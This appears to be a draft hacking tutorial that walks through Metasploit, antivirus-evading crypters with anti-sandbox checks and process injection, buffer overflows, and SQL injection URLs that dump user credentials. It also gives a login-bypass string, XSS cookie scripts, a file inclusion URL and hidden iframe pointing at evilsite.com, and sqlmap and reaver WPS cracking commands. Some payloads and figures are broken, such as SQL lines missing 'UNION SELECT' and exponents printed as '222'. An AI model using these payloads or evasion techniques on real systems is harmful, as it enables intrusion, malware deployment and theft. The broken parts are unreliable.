This program opens an interactive console for Metasploit.
• msfconsole
This lets us pass commands to Metasploit in an interactive environment.
From here we can type commands directly to MSF.
msfcli
msfweb
msfgui
Updating Metasploit
Exploitation
Payloads
Meterpreter
Encoders
Auxiliary
Credential Collection
db_autopwn
Browser Autopwn
Anti-virus Bypass
Theory
Anti-virus bypassing is any sort of program that attempts to bypass and ant-virus to get a malicious program on a machine. This often times is done by using code obscurification techniques to hide the malicious code.
Droppers
Droppers are programs that contain no malicious code but, go out to the internet and download and execute a malicious program.
Theory
Droppers are a semi competent threat, despite being picked up by anti-viruses most of the time.
However, the age old rule applies that, the longer a dropper has been around, the more susceptible it is to being caught. Newer droppers might not have this problem.
They are dangerous because an anti-virus can't keep tabs on everything running on a computer in real-time. Abusing this, a dropper downloads a program inconspicuously and then loads it into memory without a users consent.
Crypters
Crypters are programs designated to encrypt an executable so an anti-virus may not pick it up.
Theory
Crypters work by encrypting an executable using any number of methods and then, affixing a program, called a stub, to the front of it to decrypt the code. This allows us to have better control over the conditions our code runs in and, ensure undetection by way of hiding our executable in other processes.
The Encrypter
The encrypter works in this fashion:
1. Generate a stub source code file.
2. Compile the stub.
3. Place the stub at the beginning of a file.
4. Place a unique separator after the compiled stub.
5. Open a malicious executable.
6. Encrypt this executable.
7. Place the encrypted executable at the end of the file.
When the executable is run, the stub springs into action and decrypts and runs the code.
The Stub
A stub works like this:
1. Find the current directory of the process.
2. Open the executable.
3. Look for the unique separator.
4. Take only the encrypted executable and save it.
5. Decrypt the executable.
6. Inject the decrypted executable into a random process but, first, try to inject into explorer.
Antis
Antis are functions in a crypter that stop the executable from running if certain programs are running. For instance, a common “anti” is to stop the execution of the program if you are inside a VMWare virtual machine. Another is to not run if Sandboxie is running. Antis are generally a smart idea if you are afraid that your executable might come under inspection at some point.
Junk Code
Junk code is a technique used by malware authors to change the overall code of their program by adding segments of code that do not alter the program at all. A common junk code is to create an array and fill the array with random numbers, then read the numbers, then delete the array.
Buffer Overflows
This attack are one of the most commonly exploited attack according to OWASP. This attacks potency can range from a DoS attack to a full system compromise, making it a dangerous vulnerability to have present.
Theory
Buffer Overflow – An exploit that presents itself in C/C++ languages but, theoretically, can be exploited in any language that allows a program to commit data to memory without first checking the bounds of said data. A buffer overflow occurs when a program commits user input to memory without first checking the bounds of that data. When committed to the stack it causes a segmentation fault. This results in a crash under normal circumstances. However, in an attack, an attacker can overwrite the EIP register using the return value on the stack, allowing an attack to gain control of program flow. Depending on the severity of the exploit and the protections in place, exploiting it may be different under each circumstance.
Consider this code.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
char buffer[8];
strcpy(buffer, argv[1]); //Moves 1st arg into buffer
printf("buffer is %s%n", buffer);
printf("DONE!%n");
return 0;
}
This code creates a buffer which accepts 8 characters. However, there is no bounds checking done. As a result, an exploiter could input over 8 characters into the buffer and, have it still write to memory. This would overflow the buffer, and when written to stack will overflow into the stack causing a segmentation fault. This could possibly allow an attacker to take control of the program flow.
Protections
As a result of widespread exploitation, many protections have been developed to combat exploitation.
ASLR – Stands for Address Space Layout Randomization. This protection randomizes the top bit of program code, and the stack, making it harder for exploiters to reliably locate certain lauchpad commands. It's extremely popular and used in almost everything.
DEP – Stands for Data Execution Prevention. This comes in two forms, hardware and software, and is controlled by the /NX flag. The hardware version disables executable memory, stopping exploits from succeeding. A developer can still set certain memory areas as executable, in case they need to execute data from it. Software DEP is analogous to SafeSEH.
Stack Cookies – Controlled by the /GS flag. This puts a random 8 byte key before the saved EIP in the stack. Before a return is called, the program checks the key against on in the system. If they don't match up (meaning a overflow occurred and EIP is modified), it stops execution and terminates the program to prevent exploitation.
SafeSEH/SEHOP - A compiler option that sets a linked list of SEH pointers. If a SEH pointer doesn't match up with the list, it is not executed and the program is terminated.
NoSEH – This disables SEH, stopping exploits that rely on it.
Common Attacks
Despite the ample amount of protections, they aren't all fool-proof.
Launchpad – This technique is used to bypass ASLR. Due to the stacks address randomization, you can't directly jump EIP to the top of the stack, since the address won't be the same after reboot. Instead, you find a non-ASLR module and search for a JMP ESP command. Using this, you can jump to the top of the stack reliably.
SEH Overwrite – This takes advantage of SEH chains with no protections. You overwrite an SEH pointer with your own code, letting it go to a launchpad.
Egghunters – An egghunter is a piece of shellcode meant to rip through pages in memory looking for a specific pattern called an egg key,. This egg key is usually 8 bytes in length. Skape wrote a large paper on the subject, detailing different methods one could use to rip through memory without triggering exceptions.
Bypassing Stack Cookies – Stack cookies are a huge problem for exploiters as it is difficult to get around them. The easiest method is to overwrite the SEH chain and then trigger an exception before the check method is reached. This method is easily broken by SafeSEH or NoSEH.. The other way is to figure out a way to guess or calculate a stack cookie. Skape also wrote a piece on reducing the effective entropy of a stack cookie.
Problems
Bad Characters – Bad characters are bytes that have special meaning or, are specially filtered out or transmuted during an exploit. Common ones are 0x00, 0x0a, 0x0d. 0x00, for example, is a C++ string terminator and when used in an exploit, deletes everything past the 0x00 byte. 0x0a and 0x0d are carriage return and line feed characters.
Null Byte Addresses – Main program code (code contained within the executable itself) starts at 0x00??0000. As a result, one cannot use address from the main executable as the will contain a 0x00 byte.
Character Transmutation – This is a problem that happens when a buffer is first filtered or encoded before committing to a buffer. For instance, a program that might strip out any non-ASCII characters (00-7F). Anything higher will get transmuted. This also happens in UNICODE to ASCII translation as well.
Fuzzers
Fuzzer – A debugging program made to find buffer overflows by varying buffer size.
SPIKE - A well made fuzzing application. It has it's own scripting language.
Sfuzzer – A simple fuzzer meant to be a easier solution to SPIKE.
Fuzzing works by passing commands to a server with varying data sizes. If the program crashes during a fuzz, it is possibly vulnerable to a buffer overflow. For instance, take a program that accepts network data and then copies this data to the stack. A fuzzer will try A x 20 for the data. If that doesn't crash it, it will send A x 40, and so on and so forth. If the program does no bounds checking, it will eventually crash when the buffer size gets to big and overwrites EIP.
Web Based Attacks
Web based attacks are a very large set of attacks that can be performed on web applications. Often, these attacks involve a program not sanitizing user supplied data correctly.
Zero Frames and Zero Images
Zero frames and zero images are a form of obscurification, hiding HTML from the view of a webpage. Zero frames are created by setting an iframes width and height to zero or one, resulting in a webpage being rendered that a user cannot see. This is a common way for attackers to hide malicious code in legitimate webpages, infecting users without their knowledge.
<iframe height=0 width=0 src=”http://evilsite.com”></iframe>
Zero images work on the same principle but, instead, with an image. You can't render an entire webpage with it though. It is more commonly used to exploit cross site request forgery attacks.
Command Execution
Command execution takes advantage of unsanitized user input, which allows an attacker to inject commands directly into the server. This vulnerability usually takes advantage of a shell_exec() function in PHP.
Command execution techniques vary from OS to OS. Linux, for instance, with zero user input sanitation could be compromised with.
• [space]&[space][command]; [command];
However, be aware that in most scripts, you may have to satisfy certain requirements before the input will be passed along.
Cross Site Request Forgery
Cross Site Request Forgery or CSRF, is an attack that abuses authentication mechanisms that allow users to stay logged in even after the website is closed from the browser. CSRF allows an attacker to force a user to perform actions without their knowledge or consent. How it works is, an attacker makes a URL that links to an action performed on a site. For instance,
• http://www.vulnsite.com?password=”ichangedthis”&passwordconf=”ichangedthis”&submit=submit
This example, if opened by a authenticated user, would change their password to “ichangedthis”. If the links is opened directly, this would show the user the action was performed. A better way to do it is to wrap the URL in <img> tags to make a zero image. This would result in a hidden image that, when loaded, would cause the action to be performed without the users knowledge. You can also use a zero frame for this.
File Inclusion
These attacks revolve around files being included in PHP without restriction.
• http://vulnerablesite.com?page=include.php
This kind of attack contains two types of attacks, LFI (Local File Inclusion) and RFI (Remote File Inclusion).
Local
A LFI takes advantage of the ability for one to traverse directories locally, without interference, on the system. As a result certain files could be given to the attacker like, for instance, the /etc/passwd file on linux.
• http://vulnerablesite.com?page=/etc/passwd
Remote
A RFI takes advantage of being able to load other files into the include. This can be more dangerous, as it can allow an attacker to run commands using the shell_exec() function in PHP.
• http://vulnerablesite.com?page=http://evilsite.com/evil.php
SQL Injections
A form of attack meant to pass commands directly to an SQL server by using escape characters and malformed input. It can also be used to bypass authentication mechanisms by way of forcing a field to be true. It can also trick an SQL server into revealing database information.
URL
Say we have a site.
This site loads a page called updates.php in which the URL passes parameters to.
Here we can pass parameters to the PHP application by changing the 1 in the URL to whatever we want. From here, we can begin testing to see if the site properly filters user input. It's easy to check this by passing the application a character that would raise an exception in the MySQL database. We can achieve this with a single quote ( ' ) character.
We can tell if the application is vulnerable if an error is thrown.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
We can see that user input is not filtered properly and, as a result, we will be able to inject our own SQL statements.
First, we need to identify how many columns are in the table that controls the data on the page. We can do this by issuing commands tot he server via the URL, that will throw an error if a column does not exist. The ORDER BY statement will work for this.
• www.vulnsite.com/updates.php?id=1ORDER BY 1;#
Alternatively, you can also use
• www.vulnsite.com/updates.php?id=1ORDER BY 1--
This will most likely produce no errors, as the database will more than likely have more that one column. We slowly increase the amount until an error is thrown.
Unknown column '20' in 'order clause'
Once we get the error, we can infer that the table has one less than the page that threw the error, since it worked before the number was increased again.
Once we know this, we can begin injecting data directly into our page in attempt to find “vulnerable columns”. The goal is to find someplace on the page to display the data we will be collecting later. We do this with a UNION SELECT statement. We for the statement with as many columns as we found.
• www.vulnsite.com/updates.php?id=-1UNION SELECT 1,2,3,4,5,6,7,8;#
Also note that we change the page id to one that is not likely to exist, -1. This allows us to easily identify vulnerable columns.
Upon doing this we can inspect the page and see some of the numbers in our UNION SELECT showed up on the page. These numbers represent our vulnerable columns. We can inject commands and use these vulnerable columns to render this data visible to us.
We can inject a variety of commands in here to better understand the back-end servers.
For this example, we will pretend 1,2 and, 3 are all vulnerable columns.
• www.vulnsite.com/updates.php?id=-1UNION SELECT @@VERSION,USER(),DATABASE(),4,5,6,7,8;#
This will put the current database version number in column one, the current database user at column two and, the database name at column three.
Next we are going to want to get the table names from the information_schema. Please be wary of the version number, MYSQL 4 will not let you read from the information_schema without elevated privileges.
• www.vulnsite.com/updates.php?id=-1group_concat(table_name),@@VERSION,DATABASE(),4,5,6,7,8 from information_schema where table_schema=database();#
This will stuff the table names, separated by commas, into a vulnerable column. This allows us to see all the tables that we may want to compromise. By using this, we can begin to enumerate the contents of the tables.
For this example, we will pretend that the tables listed were content, users, and admin.
• www.vulnsite.com/updates.php?id=-1group_concat(column_name),2,3,4,5,6,7,8 from information_schema.columns where table_name=users;#
This will tell us all the column names for the table users. Once we get these, we can begin pulling out relevant information.
For this example, we will pretend the columns listed for users were, username, password, email, and id.
• www.vulnsite.com/updates.php?id=-1group_concat(username,0x3a,password,0x3a,email,0x3a,id),2,3,4,5,6,7,8 from users;#
This prints all the table data to the screen and, separates each column with a colon (0x3a).
Here we have completed our attack and, accessed the previously hidden table data.
Authentication Bypass
This kind of attack is done by forging SQL queries that will always return true. This way we can bypass the login of a site, allowing us access, without a legitimate account.\
An example would be a site that takes both a username and a password.
Upon putting in a correct username and password, a user can get in. Upon putting in a wrong username and password, a person is denied access.
This is done through an SQL query similar to this.
• SELECT * FROM users WHERE username='$user' and password='$pass';
By escaping the quotes, we can authenticate ourselves without even knowing the password and sometimes, even the username.
A simple authentication bypass statement would look like this.
• User: admin Password: 1' OR '1' = '1';#
This would make the statement:
• SELECT * FROM users WHERE username='admin' and password='a' OR '1' = '1';#';
Since the end quote and semicolon are commented out, the statement's syntax is correct. Above that, we can see that the statement in the password section will always equal true, since 1 is always equal to itself.
Blind
SQLmap
SQLMap is a tool for automated SQLi attacks. This will automatically find and pull vulnerable columns, and also, display the data from the tables it enumerates.
First off we need to use SQLmap to get a list of the databases.
• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1–dbs
This will brute force the available databases, allowing us to continue with our next step, enumerating the tables.
• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1-D [database] –tables
Lastly, we can dump a tables contents using the dump option.
• ./sqlmap.py -u http://vulnsite.com/updates.php?id=-1=D [database] -T [table] –dump
Cross Site Scripting (XSS)
Cross site scripting or XSS allows an attacker to inject code into URLs or webpages. These attacks often lead to mass compromises, since the attacker can upload things like java drive bys into a reputable website. These attacks commonly are used to steal authentication cookies, allowing an attacker to impersonate a victim.
Non-Persistent
These attacks aren't as bad as a persistent attack but, can be just as damaging.
The attack involves abusing some form field or URL parameters that are not sanitized. This allows an attacker to craft a special URL that when the victim opens, will reflect attack code onto the webpage.
This kind of attack is the most popularly exploited.
It involves storing code in the URL parameters, allowing an attacker to give a specific URL to people and, when the follow it, it will render attack code on the page.
• www.vuln.com?updates.php?location=<p>EVIL CODE HERE!</p>
Persistent
Persistent XSS attacks allow an attacker to post client-side code directly into the webpage. This has obvious malicious implications as anyone who visits that site can become compromised.
For instance, imagine a website that takes a comment and posts it onto a webpage. An attacker could store HTML code into the comment, of proper character checking is not in place.
For example an attackers comment could be:
<P>EVIL COMMENT</P>
However, that is not malicious but, does allow us to test the problem. We can be more malicious with:
<Script>
alert(document.cookie);
</Script>
This will display the current cookie for the domain.
In some cases the script tags can be filtered out by a script. However, script tags aren't the only dangerous thing.
<a href=”Fake.html” onHover=”javascript:alert(document.cookie);”>FAKE</a>
This will run javascript if the link is hovered over. Other methods could be iframe or zero image attacks.
Web Based Exploitation Frameworks
OWASP Mantra
OWASP Mantra is a penetration testing minded browser which has many add-ons and tools built into it for testing web site vulnerabilities. It comes in two versions, Chromium (Windows only) and Firefox (Windows/Linux).
Port Tunneling
Port Tunneling – Redirecting network traffic to a port or proxy as to avoid detection, firewalls, or network blocks.
Theory
In the following example the attacker is in the cloud and the victim is behind a firewall that blocks all traffic in port X.
Tunneling works like so:
1. The attacker connects and sends data to the proxy on port X.
2. The proxy then forwards the data from port X to port Y.
3. The victim receives the data on port Y and send out a reply through Y.
4. The proxy forwards the data from port Y to port X.
5. The proxy sends the data through port X to the attacker.
In this example there is a middle man (The proxy) which redirects all the traffic. This helps the attack communicate with the victim because the firewall block all traffic on X but, not on Y.
This also can help to protect your anonymity.
HTTP CONNECT Tunneling
HTTP CONNECT has a wonderful feature where we can tunnel traffic over HTTP to a specific port. This uses a server as a proxy to reach the internet.
All we do is netcat into a HTTP CONNECT server and type the following:
• HTTP CONNECT [server]:[port} HTTP/1.0
SSL Tunneling
SSL Tunneling is a technique to add SSL functionality to programs or protocols that normally don't have SSL. This is useful when in an environment that might have certain SSL ports blocked or, you have a need to have a secure communication between protocols that have no encryption. However, the accepting party must have SSL enabled on their server or it will just drop the SSL traffic. This can be done by either setting SSL up for a specific protocol or, setting stunnel in server mode.
stunnel
stunnel – A free port forwarding tool. It is used as a wrapper to encrypt incoming and outgoing network traffic using SSL.
Stunnel also lets us bypass firewalls and IDSs since the traffic is encrypted and, we can send it through a legitimate SSL port such as 443.
Stunnel's configuration file is located in /etc/stunnel/stunnel.conf.
Once we have edited the configuration file, we can start stunnel using
• stunnel4
Be sure you have a certificate file and, it is pointed to in the stunnel configuration file.
SOCKS
SOCKS is a proxy server that allows all port traffic through, allowing for a more comprehensive sense of anonymity.
SSH Tunneling
SSH Tunneling – A tunneling protocol that connects to a computer using SSH and then redirects traffic from the SSH session to a port. Since the client is not only the client but, also the middleman, it makes things much faster.
Local
Local SSH port forwarding involves redirecting traffic from a port on the client and forwarding it through the SSH session to a local port on the ssh server.
• ssh -L [local-port]:localhost:[server-port] [host]
This will redirect 8080 on the client to the servers port 80.
Remote
Remote port forwarding allows you to connect to a server through another SSH server
• ssh -R [local-port]:localhost:[server-port] [host]
This would let the host connect to your port through the SSH tunnel by pointing his client to localhost:5900
Dynamic
This lets us forward all traffic through SOCKS and is a wonderful solution for complete network security.
• ssh -C -D [port] [host]
With this we can easily set up most clients to use the proxy settings and be allowed full anonymity.
Tor
Tor – A system of proxies acting as nodes to protect anonymity and information. All the data is encrypted over the tor and it provides good route security.
Theory
Tor works by not just using one proxy but, by using many in a route sequence. Tor uses a large amount if nodes. In every connection a random route is chosen, ensuring that anonymity is kept.
Installing
Using
Authentication Vulnerabilities
Theory
Authentication mechanisms are something that must be treated with the utmost security and cautiousness. However, some technologies still used today have extremely weak authentication systems in place. Often, some services send data completely in plain-text.
Problems With Networks
The big issue with networks is that someone can insert themselves in between a client and a server, allowing them to hear all traffic between them. Despite this there are secure ways of exchanging information even if a third party is listening.
Plain Text
This is the most vulnerable to attack. Usernames and passwords are sent in plain-text, allowing anyone to listen in. While this is the easiest to implement, this is the least secure.
FTP, POP, SMTP, and HTTP all use clear text systems.
Hashing Systems
Hashing systems involve encrypting a password one way. This means that I can turn a password into a hash but, I can't get a password back if I only have the hash. This adds a layer of security but, is a flawed methodology. Since the hash is as good as the password itself, it is considered just as good. As a result, one only needs to obtain the hash and they can compromise a user account.
SMB uses a hash system.
MD4
DES
MD5
SHA1
NTLM
MYSQL
Challenge Systems
Challenge systems take a better step in the right direction, however, can be flawed as we will see in the here be dragons section. Challenge systems build upon the hash system. When a computer comes to connect to a server, the server asks for the password and gives the client a challenge. This challenge can be any length but, for the sake of pacing, it will be only 4 characters longs. So the server gives the client the challenge 4444. The client then takes the password hash and one way encrypts it again, now using the challenge. The client sends the challenge/hash text back and the server compares the encrypted hashes. Challenges are randomly created at the time of connection.
Basically, the third party only gets the challenge and the encrypted hash. Since the encryption is one way, they can't do much with it. This also breaks most brute-force, dictionary,and rainbow table attacks as the client now has much more to do than just sending the password, he has to hash the password and then encrypt it using a challenge. This boosts the instruction amount, making it take much longer.
Common ways around this are to force a client to connect to you and send them the insecure challenge 1234. People have written tools and crackers based around this insecure hash and, as a result, one can often guess the password.
SMBv2 users a challenge response system.
Uneven Algorithms
Uneven algorithms are the hardest to break and, involve a high amount of security. This involves creating two sets of keys, a public and private key. The public key is given to the client while, the private key is kept for oneself. The public key is used to encrypt data, while, the private key is used to decrypt it.
The only thing the attacker can gain is the public key, which can only encrypt data, therefore being worthless to the attacker.
SSH uses uneven algorithms to encrypt data.
Here Be Dragons
This section is about mistakes made in the industry over the years but, mostly criticizes Micro$oft.
Back in 2008 Microsoft released a patch for a vulnerability called the SMB credential reflection attack. The attack was made popular by the Metasploit module made to leverage the vulnerability. Since SMB uses a hashing system, the hash is as good as the plain-text password. As a result, someone found that you could trick a computer into giving up the username and password hash of a victim. The attack worked by referencing a SMB share in a webpage by way of <IMG> tags. When the victim loaded up this webpage the computer attempted to access this share by first trying a user's name and password. All that was needed by the server is to reflect the information back and they would have access to the users account. A patch was eventually released.
Later in 2011, a person on exploit-db came forward with an attack aimed at SMBv2. This vulnerability leveraged an attack on the way SMBv2 handles challenges. The challenges weren't truly random and, as a result, an attacker could use this to gain access to the system.
How it works is, an attacker first attempts a connection to an SMB server. The server offers it a challenge, and then stores it. It then makes a new connection and gets a new challenge. It repeats this until it has around 8000 challenges. Then, the victim opens their web browser and is sent to a webpage with a refreshing javascript image linked to the servers SMB share. When the victim connects it offers it a challenge that it got previously. It does this until it collects all the challenge, encrypted has combinations. Then, the server connects back to the victim and keeps reconnecting until it gets a challenge it knows the answer to. It then replays the hash and gains access.
This was a huge mistake on Micro$oft's part as twice their default service has had huge gaping authentication holes that were leveraged in very similar ways.
The moral here is to figure out what the problem really is. The problem here wasn't necessarily the authentication system but, the fact that images could be linked to SMB shares in HTML. Microsoft could have easily disabled this as no-one uses this feature. Instead they beefed up security but, ultimately left this huge gaping hole and, they paid for it.
Password Attacks
Passwords are one of the weaker links in the security chain, and often times, we must add huge amounts of security to password systems to ensure there are protections for users. Most breaches are of those involving passwords, since humans will often use the same weak password for every account they own, allowing an attacker to breach all of their online accounts.
Theory
Password attacks often involve a form of password guessing, either online or offline. Some users can be easily profiled for their passwords, making this significantly easier. Others may have passwords that can't be profiled but, easily guessed or, compromised in a different fashion. Others might have secure passwords but, are still vulnerable to guessing attacks or, the password hash is easily available, allowing an offline attack. As a result, password systems can often be defeated if simple systems aren't put in place to mitigate attacks.
Strong Vs. Weak Passwords
Weak passwords often have many associated weaknesses that can make them easily guessed.
Weak passwords often times:
• are a single word
• less than 10 characters
• use only one character set (Ex: A-Z only)
These characteristics make them easily guessed and, dangerous.
A strong password usually has these characteristics:
• Multiple words
• more than 10 characters
• uses more than one character set (Ex: a-z,A-Z,1-9,symbols)
Some examples of weak and strong passwords.
Weak
|
Strong
|
easy
|
N0ts034sy!
|
weakpassword
|
5T0n9P4$$w0rD**
|
Brute Force
Brute-forcing is a password attack that guesses the password by starting at a base and adding one position to the password until it gets the right one. These attacks can take a while, especially when passwords have a high character count.
This attack can be done in both online and offline attacks. However, it is most suitable for online as, there are better and faster ways to get a password in an offline situation.
Ways to mitigate this is to either, make a large instruction set for sending the password, such as having to encrypt the password using a Caesar cypher according to the current server date. This ups the instruction count, making it take longer. Another way would be to implement a lockout of the service when a certain amount of tries are used. Linux handles this by making it so the hashes can only be compared every 5 seconds, so when a password is guessed wrong, they can't compare again until the time limit is up.
Dictionary
Dictionary attacks are done using a wordlist, which is a giant list of possible passwords. The attacker goes through each list and attempts to find a valid password. The wordlist can be any size, however, they often use only dictionary words and common passwords.
This attack can be done in both online and offline attacks. It is a suitable attack for both, however has a low yield, since the password might not be on the list.
You can mitigate this attack with most of the techniques in the brute-force section.
Rainbow Tables
Rainbow tables are an offline only attack that is considered the best solution for offline attacks. It involves creating a giant list of all the hash, plaintext password possible for a given set, such as characters a-z,A-Z,1-9,0,symbols up to characters 1-10. This could crack just about any password in our set, up to 10 characters.
Brute-force and dictionary attacks both cost a lot CPU wise, rainbow tables relieve some of the load but, take up a lot of space of disk. The table mentioned above would be roughly 250GB-500GB in size.
Rainbow tables take a long time to generate and, as a result, most are paid for. However, there is a group that makes them for free by using the community as a giant cluster.
GPU Cracking
This technique leverages Nvidia CUDA GPUs to do more work quicker.
Misconceptions
In all actuality, the guidelines I gave earlier for strong passwords are actually a little off. The truth is that the passwords I listed as “strong” passwords, aren't so strong but, in the scheme of things, can be OK for some applications.
Consider this character set which we will call the “Strong” Character Set (SCS):
a-z, A-Z, 1-0, symbols(!@#$%^&*()-+_=?)
The total amount of characters in the set:
a-z = 26
A-Z = 26
1-0 = 10
symbols = 15
Total: 77
Now consider a character set aptly named the “Weak” Character Set (WCS):
a-z,1-0
The total number of characters in the set
a-z = 26
1-0 = 10
Total: 36
First off, we will make a password fitting the guidelines of the first section and, follows along with the character set SCS, M0un741n5**.
First thing we should talk about the is the cons of this password. It's difficult to remember. It contains a huge character set and a lot of confusing symbols. In fact, I'm willing to make a bet the most people won't be able to remember if the o in password was a 0 or an o. However, lets take a look at how long it would take to crack the password containing these guidelines, brute-force style.
M0un741n5**
Chars: 11
Character set length: 77
Entropy of each character: We will assume 2
Total bits of entropy: ~28 (I made a pretty generous addition in it's favor)
Amount of guesses needed: 222
Time needed to crack: About 3.1 days at 1000 guesses a second.
Now lets make a password using WCS but, we will up the character count, allowing us to make a more secure password.
First, lets take a phrase and remove all the spaces, and then tack the number of words in it to the end, for this example it will be, thispasswordseemsunsecure4.
thispasswordseemsunsecure4
Chars: 26
Character set length: 36
Entropy of each character: We will assume 1.5
Total bits of entropy: ~54
Amount of guesses needed: 254
Time needed to crack: So long, I couldn't even calculate the time.
This password is easy to remember and, is hard for computers to guess.
XKCD made a joke about this in a comic, the punchline says, “Over the past 20 years, we've taught people to use passwords that would be hard for humans to remember and, easy for computers to guess.
hydra
xhydra
medusa
ncrack
Wireless Attacks
Theory
Wireless attacking has become extremely popular in the last couple of years due to it's extreme popularity and lax security standards. The biggest issue is that, unlike wired networks, it is easy to listen in on all communication that transpires between a client and an access point.
WEP
Wired Equivalent Privacy or WEP was the first wireless privacy standard to be released. In it's beginnings, many white hat researchers wrote papers detailing WEPs huge gaping flaws however, their security concerns were ultimately ignored. WEP still remains the most popular wireless security standard despite being hard to use, having cryptic keys, and is easily broken.
WEP can have multiple keys, however, this does not make the point more secure.
WEP works by encrypting the password with an RC4 symmetrical key.
The frame body of the packet contains an initialization vector or IV, the encrypted data, and an integrity check value or ICV which is an encrypted checksum. The IV is 3 bytes and ICV is 4 bytes in length.
IVs are generated randomly and prepended to the packet. IVs work as a cryptographic salt and are also used in packet generation. During packet generation, the IV is prepended to the WEP key, then encrypted using the RC4 algorithm.
The RC4 algorithm is made up of two processes, a Key Sharing Algorithm (KSA) and a Psuedo-Random Generation Algorithm (PRGA).
Next an ICV is formed on the data, allowing it to be checked for integrity. The data is prepended to the ICV. This concatenated data is then XORed with the RC4 encrypted IV/WEP key combo. Afterwards, the IV is again prepended to the encrypted data.
The finalized packet looks like this.
Not Encypted
|
Encypted
| |
IV (3 bytes)
|
Data
|
ICV (4 bytes)
|
WEP Cracking
Cafe Latte
Cafe Latte is an attack that was mainly performed in coffee shops but, can be performed anywhere there is a computer attempting to reach a wireless network that is no longer in range. The attack involves a computer broadcasting that it is looking for a specific network. An attacker can pretend to be this network get the access point to give up the wireless password.
ARP Replay
Korek's Chop Chop Attack
Korek's Chop Chop Attack was an attack that allows the decryption of packets due to a flaw in packet validation on the AP's part.
The attack works by first obtaining an encrypted packet. The packet is split up into 3 parts, the IV, the encrypted data, and the ICV. The attacker then chops off the last byte and, sets the byte to 00. It then recalculates the ICV using a special method Korek invented.
Once the ICV is recalculated, it is sent back to the AP. If the byte was right, the AP will say it is correct, if it is not, the AP will tell the attacker the packet was wrong. The attacker then increments the 00 byte and, resubmits. It does this until it gets a correct response. It then moves to the next byte, doing the procedure over and over until it has fully decrypted the packet.
The attack manages to guess each byte within 128 tries, since the max it can go is 256. This attack can eventually yield a password, if done correctly.
Hirte Attack
Fragmentation Attack
WPA
WPA Cracking
WPA2
WPA2 Cracking
WPS
WPS (Wi-Fi Protected Setup) is a security feature common to most routers that comes in two varieties the PIN and button. WPS works to allow easy sharing of WPA/WPA2 passwords with a client who needs a connection. For the PIN version, the network administrator can give a WPS PIN to a client to allow them to connect. The button version sends the PIN to any client who connects when the WPS button is pressed on the router.
WPS Cracking
WPS cracking involves using two tools, wash and reaver to find vulnerable networks and bruteforce the PIN.
Wash
Wash is a tool to find WPS vulnerable access points. First, ensure your card is in monitor mode (See: airmon-ng) then, use the following command to begin scanning for vulnerable networks.
• wash -i [interface]
Wash will then find all vulnerable access points and display them. Access points that have WPS Locked set to no are vulnerable to attack, while a yes in that same column denotes it is invulnerable to attack.
Reaver
Reaver is a tool that can be used to brute-force an access points WPS PIN.
• reaver -i [interface] -b [bssid] -vv
Reaver will save your session if you decide to leave/stop an attack, and will resume when the command is run again.
DoS Attacks
Deauthentication Attacks
This attack involves sending massive amounts of deauth frames to a computer (or all computers) connected to an access point. By faking the MAC address of the access point the victim believes the request is legitimate.
Man In The Middle
The wireless man in the middle attack abuses computer trust for wireless access points. The attack revolves around the fact that a computer will auto-connect to an access point that is the closest signal and if it is already known.
